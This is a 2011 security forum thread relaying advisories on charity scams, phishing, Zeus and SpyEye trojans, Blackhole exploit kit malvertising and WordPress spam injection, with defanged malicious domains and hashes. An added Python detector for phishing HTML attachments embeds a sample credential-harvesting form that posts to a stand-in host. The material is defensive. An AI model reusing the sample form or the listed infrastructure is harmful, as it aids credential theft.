SPAM frauds, fakes, and other MALWARE deliveries...



#436 AplusWebMaster


Posted 11 March 2011 - 04:00 PM

FYI...

Disaster brings fakes, scams, malware pushed by hacks ...
- http://isc.sans.edu/...l?storyid=10537
Last Updated: 2011-03-11 13:29:49 UTC - "There will probably be some emails scams and malware circulating regarding the recent Japanese earthquake that occurred overnight...
Be aware of:
Fraudulent Organizations: If possible, donate to organizations you know and trust, not to new organizations just set up for this particular event. The IRS maintains a list of tax exempt charitable organizations*. This list is not 100% up to date, and it takes a while for a new organization to be added. But it can serve as a first sanity check.
Malware: Malware may be advertised as a video report of the event or come under other pretenses..."

* IRS online charities search can be found here: http://www.irs.gov/app/pub-78/

> http://blog.trendmic...-lead-to-fakea/

> http://www.f-secure....s/00002119.html

> http://www.us-cert.g...sunami_disaster


Edited by AplusWebMaster, 12 March 2011 - 06:25 AM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.



#437 AplusWebMaster


Posted 15 March 2011 - 11:07 AM

FYI...

FTC advisory - charity SCAMS
- http://www.ftc.gov/o...earthquake.shtm
03/14/2011 - "After the earthquake that rocked Japan’s northeast coast and triggered a widespread tsunami last week, the Federal Trade Commission is urging consumers to be cautious of potential charity scams... carefully consider urgent appeals for aid that (are received) in person, by phone or mail, by e-mail, on websites, or on social networking sites. The agency’s Charity Checklist* advises consumers about donating wisely to charities..."
* http://www.ftc.gov/b...rts/alt114.shtm
___

- http://community.web...e-disaster.aspx
15 Mar 2011

Edited by AplusWebMaster, 18 March 2011 - 09:57 PM.


#438 AplusWebMaster


Posted 16 March 2011 - 09:42 PM

FYI...

Phish targets BoA, PayPal...
- http://www.theregist...firefox_chrome/
17th March 2011 - "... phishing attacks targeting customers of Bank of America and PayPal circumvent fraud protections built in to the Mozilla Firefox and Google Chrome browsers by attaching an HTML file to the spam email. According to M86 researcher Rodel Mendrez*, the locally stored file opens a web form that collects the customers' login credentials, credit card numbers and other sensitive information and then uses a POST request to zap them to a PHP application on a legitimate website that's been compromised. By avoiding the use of more verbose GET requests and known phishing sites, the scam flies completely under the radar of the browsers' fraud protection features..."
* http://labs.m86secur...tml-attachment/
March 15th, 2011 - "... Phishers... have found ways to circumvent this anti-phishing protection by attaching an HTML file to the spam email. This system avoids the HTTP GET request to the phishing site, thus avoiding being blocked by the browser..."



#439 AplusWebMaster


Posted 18 March 2011 - 06:11 AM

FYI...

Twitter SCAMS spreading fast
- http://nakedsecurity...spreading-fast/
March 17, 2011 - "... Thousands of Twitter users are falling once again for a scam that requires victims to grant access to a malicious application. Today's scam seems to be a continuance of a trend in which the scammers are adapting their ego-driven bogus Facebook apps to operate on Twitter... If you accept the application, not only will it post to your Twitter feed, it will also display an image with a random number that supposedly represents the number of people who have viewed your profile. Not surprisingly, the revenue generating opportunity for these scammers is a fake IQ test that suggests you could win a free iPad*... The advice remains the same as for Facebook. Be cautious of which games/apps you approve and carefully audit the authorization page to see if an app wants control of your account or permission to post..."
* http://sophosnews.fi...1...w=500&h=244



#440 AplusWebMaster


Posted 18 March 2011 - 11:31 AM

FYI...

SPAM/phish continues...
- http://www.us-cert.g...phishing_attack
March 18, 2011 - "... public reports of an ongoing phishing attack. At this time, this attack appears to be targeting PayPal, Bank of America, Lloyds, and TSB users. The attack arrives via an unsolicited email message containing an HTML attachment. This attack is unlike common phishing attacks because it locally stores the malicious webpage rather than directing user to a phishing site via a URL. Many browsers utilize anti-phishing filters to help protect users against phishing attacks, this method of attack is able to bypass this security mechanism..."
___

- http://tools.cisco.c...r...&sortType=d
March 18, 2011

Edited by AplusWebMaster, 18 March 2011 - 12:46 PM.
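
The HTML-attachment technique described in posts #438 and #440 can be checked for at the mail gateway. The following is an added example, not part of the original posts or the cited reports: it walks a message's MIME parts, parses HTML attachments, and flags forms that collect credential-like fields and submit them to a remote http(s) host. The sample message, the host name and the `SENSITIVE_HINTS` list are constructed assumptions.

```python
import email
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# Field-name fragments treated as sensitive (an assumption; tune as needed).
SENSITIVE_HINTS = ("pass", "pin", "card", "cvv", "ssn")

# Constructed sample message for the demonstration, not a captured phish.
SAMPLE = b"""\
From: "Account Service" <service@example.test>
Subject: Account verification required
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="BOUND"

--BOUND
Content-Type: text/plain; charset="us-ascii"

Please open the attached form to restore access.
--BOUND
Content-Type: text/html; charset="us-ascii"; name="verification.html"
Content-Disposition: attachment; filename="verification.html"

<form method="POST" action="http://compromised.example.test/images/save.php">
<input type="text" name="login"><input type="password" name="pass">
<input type="text" name="cardnumber"><input type="submit" value="Continue">
</form>
--BOUND--
"""


class FormFinder(HTMLParser):
    """Record every <form> with its action, method and input fields."""
    def __init__(self):
        super().__init__()
        self.forms = []
        self._open = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._open = {"action": a.get("action", "").strip(),
                          "method": a.get("method", "get").lower(),
                          "fields": []}
            self.forms.append(self._open)
        elif tag == "input" and self._open is not None:
            self._open["fields"].append(
                (a.get("type", "text").lower(), a.get("name", "").lower()))

    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None


def scan_message(raw):
    """Flag credential forms in HTML attachments that submit to a remote host."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        name = part.get_filename() or ""
        if part.is_multipart() or not name:
            continue
        if (part.get_content_type() != "text/html"
                and not name.lower().endswith((".htm", ".html"))):
            continue
        data = part.get_payload(decode=True) or b""
        finder = FormFinder()
        finder.feed(data.decode("utf-8", errors="replace"))
        for form in finder.forms:
            url = urlparse(form["action"])
            if url.scheme not in ("http", "https") or not url.hostname:
                continue  # relative action: resolves to a local file
            fields = sorted({n or t for t, n in form["fields"]
                             if t == "password"
                             or any(h in n for h in SENSITIVE_HINTS)})
            if fields:
                findings.append({"attachment": name, "method": form["method"],
                                 "post_host": url.hostname, "fields": fields})
    return findings
```

Calling `scan_message(SAMPLE)` returns one finding naming the attachment, the remote host and the sensitive fields; a form whose action is a relative path produces none.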


#441 AplusWebMaster


Posted 18 March 2011 - 09:25 PM

FYI...

Fake Facebook email - Zbot and Black Hole Exploit Kit "all in one"
- http://community.web...ments-spam.aspx
18 Mar 2011 - "Websense... has detected a new malicious email campaign that masquerades as originating from Facebook. The campaign appears to actually be originating from the Cutwail/Pushdo spam bot. This time round, the Cyber criminals employ two attack vectors: social engineering and an exploit kit. Both end up with the Zeus/Zbot Trojan installed on the targeted machines... The malicious email is spoofed to appear to be coming from Facebook.com and says: "Hi, someone loves your photo comments, please click on the link to see all comments". It provides a fake URL disguised as a formal Facebook link. Once clicked, the user is redirected to an attack page and is prompted to download and run an "update" from Facebook. The "update" file is a Zeus/Zbot Trojan variant. At the time of writing, the file had only a 7% detection*... The attack isn't over yet. While the fake Facebook page loads, the user's machine is attacked silently with several exploits in the background. The exploits are sent via an iframe contained in the fake Facebook attack page. This process happens silently when the attack page is loaded. The exploits are loaded from one of the most prevalent exploit kits today - the Blackhole exploit kit. -Any- successful exploitation results in the Zeus/Zbot Trojan installed silently on the user's machine..."
* http://www.virustota...c0f1-1300384459
File name: facebook.update.utility.exe.1
Submission date: 2011-03-17 17:54:19 (UTC)
Current status: finished
Result: 3/43 (7.0%)
There is a more up-to-date report...
- http://www.virustota...c0f1-1300478516
File name: 8bba2928b7060906a3d433a96856acbb
Submission date: 2011-03-18 20:01:56 (UTC)
Result: 14/41 (34.1%)
There is a more up-to-date report...
- http://www.virustota...c0f1-1300555240
File name: 8bba2928b7060906a3d433a96856acbb
Submission date: 2011-03-19 17:20:40 (UTC)
Result: 18/41 (43.9%)

Edited by AplusWebMaster, 19 March 2011 - 12:25 PM.


#442 AplusWebMaster


Posted 21 March 2011 - 05:14 AM

FYI...

Tax Season - phishing scams, malware campaigns
- http://www.us-cert.g...phishing_scams1
March 16, 2011 - "... These phishing scams and malware campaigns may include, but are not limited to, the following:
* information that refers to a tax refund
* warnings about unreported or under-reported income
* offers to assist in filing for a refund
* details about fake e-file websites
These messages which may appear to be from the IRS, may ask users to submit personal information via email or may instruct the user to follow a link to a website that requests personal information or contains malicious code...
• Do not follow unsolicited web links in email messages.
• Maintain up-to-date antivirus software..."
- http://www.irs.gov/p....html?portlet=5

(More info and detail at both URLs above.)



#443 AplusWebMaster


Posted 25 March 2011 - 12:32 PM

FYI...

Spotify users attacked by drive-by malware...
- http://news.netcraft...by-malware.html
25 March, 2011 - "Users of the Spotify Free music streaming software have been attacked by drive-by malware. At least one attack used a Java exploit to drop malicious executable code on a victim's computer, with AVG software identifying one of the malicious payloads as Trojan horse Generic_r.FZ. Another threat blocked by AVG was a Blackhole Exploit Kit hosted on the uev1 .co .cc domain. Several people have reported the problem to Spotify over the past 24 hours, and attacks are still being reported at the time of publication. It is believed that the attacks are being launched through malicious third-party adverts which are displayed in ad-supported versions of the Spotify software. By exploiting local software vulnerabilities, the attacker can then install malware on unprotected computers."

- http://community.web...icious-ads.aspx
25 Mar 2011 - "... The first report we have of a malicious ad being displayed is from around 11:30 GMT on March 24... In this case the malicious ad is actually displayed inside of the Spotify application... The application will render the ad code and run it as if it were run inside a browser. This means that the Blackhole Exploit Kit works perfectly fine and it's enough that the ad is just displayed to you in Spotify to get infected, you don't even have to click on the ad itself. So if you had Spotify open but running in the background, listening to your favorite tunes, you could still get infected. Seems like free does come at a price after all. Spotify removed all 3rd party ads in the free version while they did their investigation but the ads have now been turned back on again. Once the ad was displayed, the computer would connect to hxxp: //uev1 .co .cc where the exploit kit tries several vulnerabilities to infect the user. The IP address where the malicious content is hosted is well-known to us and we have seen it host the same exploit kit on several other domains... One of the vulnerabilities the exploit kit uses is a vulnerability in Adobe Reader/Acrobat. The kit uses a heavily obfuscated PDF file to make the infected computer download the fake AV software. Here are the VirusTotal reports for the PDF and the fake AV file*. Once the fake AV is launched it connects to the following domains to download additional content, including a rootkit** which is a packed version of TDSS:
• tuartma .in, rappour .in, findstiff .org, searchcruel .org, findclear .org, replity .in, searchgrubby .org, demivee .in, ripplig .in..."
(Screenshots and more detail available at the URL above.)
* http://www.virustota...7acf-1301413767
File name: L9FPB1.pdf
Submission date: 2011-03-29 15:49:27 (UTC)
Result: 12/43 (27.9%)

** http://www.virustota...f261-1301086553
File name: spotify_dropped.exe
Submission date: 2011-03-25 20:55:53 (UTC)
Result: 4/43 (9.3%)
There is a more up-to-date report...
- http://www.virustota...f261-1301408014
File name: f5dcd2415fa4b069c0b934baee109ea5
Submission date: 2011-03-29 14:13:34 (UTC)
Result: 21/41 (51.2%)

Edited by AplusWebMaster, 02 April 2011 - 05:28 AM.


#444 AplusWebMaster


Posted 29 March 2011 - 11:21 AM

FYI...

IRS Scam - by Fax
- http://krebsonsecuri...hishing-by-fax/
March 29, 2011 - "Scammers typically kick into high gear during tax season in the United States, which tends to bring with it a spike in phishing attacks that spoof the Internal Revenue Service. Take, for example, a new scam making the rounds via email, which warns of discrepancies on the recipient’s income tax return and requests that personal information be sent via fax to a toll-free number. A new phishing campaign that began sometime in the last 24 hours is made to look like it was sent from irs@irsonline.gov, and urges recipients to fill out, print, and fax an attached PDF tax form... That 866- phone number is currently returning a fast-busy signal, which suggests either that a lot of people are falling for this scam, or that anti-scammers are speed-dialing the number in a bid to prevent would-be victims from faxing in their forms... It’s worth noting that the data requested in this bogus IRS form includes the Social Security number, e-File PIN and adjusted gross income, all of which are crucial pieces of information that the IRS uses to authenticate taxpayers. The IRS has been careful to note that while it may conduct follow-up correspondence with taxpayers via email if the taxpayer chooses to communicate that way, it will -never- reach out to taxpayers via email..."



#445 AplusWebMaster


Posted 04 April 2011 - 02:28 PM

FYI...

Epsilon breach...
- http://www.databreaches.net/?p=17374
April 3, 2011 - "... See Brian Krebs’ commentary* on the fears about spear phishing as a result of this breach..."
* http://krebsonsecuri...spear-phishing/
April 4th, 2011 - "... be especially alert for targeted email scams in the coming weeks and months, following a breach at a major email marketing firm that exposed names and email addresses for customers of some of the nation’s largest banks and corporate brand names. Late last week, Irving, Texas based Epsilon issued a brief statement warning that hackers had stolen customer email addresses and names belonging to a “subset of its clients.” Epsilon didn’t name the clients that had customer data lost in the breach... Among Epsilon’s clients are three of the top ten U.S. banks – JP Morgan Chase, Citibank and U.S. Bank — as well as Barclays Bank and Capital One. More than two dozen other brands have alerted customers to data lost in the Epsilon breach..."
___

- http://isc.sans.edu/...l?storyid=10651
Last Updated: 2011-04-04 20:24:45 UTC
- http://www.darkreadi...le/id/229400828
Apr 04, 2011
___

- http://community.web...of-epsilon.aspx
April 14, 2011 - "... attack page tries to get visitors to download the malicious binary by convincing them that there was an update to the press release dated April 8th. The "update" states that Epsilon's investigation into the data leak has revealed that personally identifiable information was lost in the attack. The fake update goes on to state that people can check to see if their personal information was lost by downloading and installing an "Epsilon Secure Connect Tool."* The downloaded file is called EpsilonSecureConnect.exe..."
* http://www.virustota...125d-1302850824
File name: [11757]EpsilonSecureConnect.exe.#
Submission date: 2011-04-15 07:00:24 (UTC)
Result: 20/41 (48.8%)

Edited by AplusWebMaster, 15 April 2011 - 05:49 AM.


#446 AplusWebMaster


Posted 04 April 2011 - 11:25 PM

FYI...

Twitter worm "Profile Spy"...
- http://www.theregist...5/twitter_worm/
5 April 2011 - "... a virally spreading worm that attempts to make money by scamming users into filling out surveys and viewing advertisements.
The rogue Twitter app is known as Profile Spy and gets installed by people who are tricked into believing it can tell them who has been viewing their online microposts. “Wow! See who viewed your twitter with Profile Spy,” the come-on reads. Those who click on the link are asked to allow the app to access and update their account data. Once they do so, they are presented with an unending series of popups for online surveys and ads promoting car insurance, long distance services and games, according to Errata Security CEO Rob Graham*, who blogged about the worm on Monday..."
* http://erratasec.blo...rofile-spy.html
April 04, 2011



#447 AplusWebMaster


Posted 05 April 2011 - 11:24 AM

FYI...

SpyEye banking trojan - same as ZeuS...
- http://www.theregist..._mobile_trojan/
5 April 2011 - "Cybercrooks have deployed a sophisticated man-in-the-mobile attack using the SpyEye banking Trojan toolkit. The Trojan, which infects Windows machines, displays additional content on a targeted European bank's webpage that requests prospective marks to input their mobile phone number and the IMEI of the device. The bank customer is informed the information is needed so that a new "digital certificate" can be sent to the phone... More information on the SpyEye-based mobile banking Trojan attack can be found in a blog post by F-Secure here*."
* http://www.f-secure....s/00002135.html
April 4, 2011



#448 AplusWebMaster


Posted 06 April 2011 - 05:26 AM

FYI...

Symantec Internet Security Threat Report...
- http://www.symantec....rid=20110404_03
April 5, 2011 – "Symantec... today announced the findings of its Internet Security Threat Report, Volume 16, which shows a massive threat volume of more than 286 million new threats last year, accompanied by several new megatrends in the threat landscape...
> 2010: The Year of the Targeted Attack...
> Social Networks: Fertile Ground for Cybercriminals...
> Attack Toolkits Focus on Java...
> Mobile Threat Landscape Comes Into View...
> Key Facts and Figures:
• 286 million new threats...
• 93 percent increase in Web-based attacks...
• 260,000 identities exposed per breach...
• 14 new zero-day vulnerabilities...
• 6,253 new vulnerabilities...
• 42 percent more mobile vulnerabilities...
• One botnet with more than a million spambots - Rustock..."
(More detail available at the URL above.)



#449 AplusWebMaster


Posted 10 April 2011 - 04:56 AM

FYI...

Facebook "video" SCAMS...
- http://community.web...n-facebook.aspx
9 Apr 2011 - "... scam making its way across Facebook linking to a video titled "The Hottest & Funniest Golf Course Video - LOL"... When clicking on the link you're taken to the following page, tricking you into not only liking the page but also sharing it with your friends. It's doing this by using standard Facebook APIs... After liking and sharing the page, and attempting to view the video, the user is taken to a typical CPA Survey scam so in the end there's no video at all... As always, if a video forces you to like, share, or install an app to view it, DON'T..."



#450 AplusWebMaster


Posted 12 April 2011 - 04:07 AM

FYI...

WordPress sites hacked - link injection – Blackhat SEO SPAM
[1] - http://blog.sucuri.n...t-seo-spam.html
April 11, 2011 - "For the last few months we’ve been tracking and helping webmasters affected by a very large blackhat SEO spam campaign initiated by basicpills .com and many other domains[1] located at 212.117.161.190. They infected thousands of WordPress sites and injected spam links directly in their databases (the wp-post table)... For the site owners out there, you can check if your site has been infected by scanning it with our malware and spam scanner*. It will show if these links have been added, and if you have other security issues. If your site has been hacked, we recommend changing your DB passwords immediately and checking the permissions of your wp-config.php file..."
* http://sitecheck.sucuri.net/

> http://centralops.ne...ainDossier.aspx
** canonical name: basicpills .com.
addresses: 212.117.161.190...
http://google.com/sa...basicpills.com/
... This site was hosted on 1 network(s) including AS5577 (ROOT).

** 212.117.161.190
country: LU
origin: AS5577
> http://www.google.co...ic?site=AS:5577
"Of the 1939 site(s) we tested on this network over the past 90 days, 98 site(s)... served content that resulted in malicious software being downloaded and installed without user consent... Over the past 90 days, we found 64 site(s) on this network... that appeared to function as intermediaries for the infection of 139 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 316 site(s)... that infected 4190 other site(s)..."
___

- http://en.blog.wordp...04/13/security/
April 13th, 2011

Edited by AplusWebMaster, 17 April 2011 - 04:24 AM.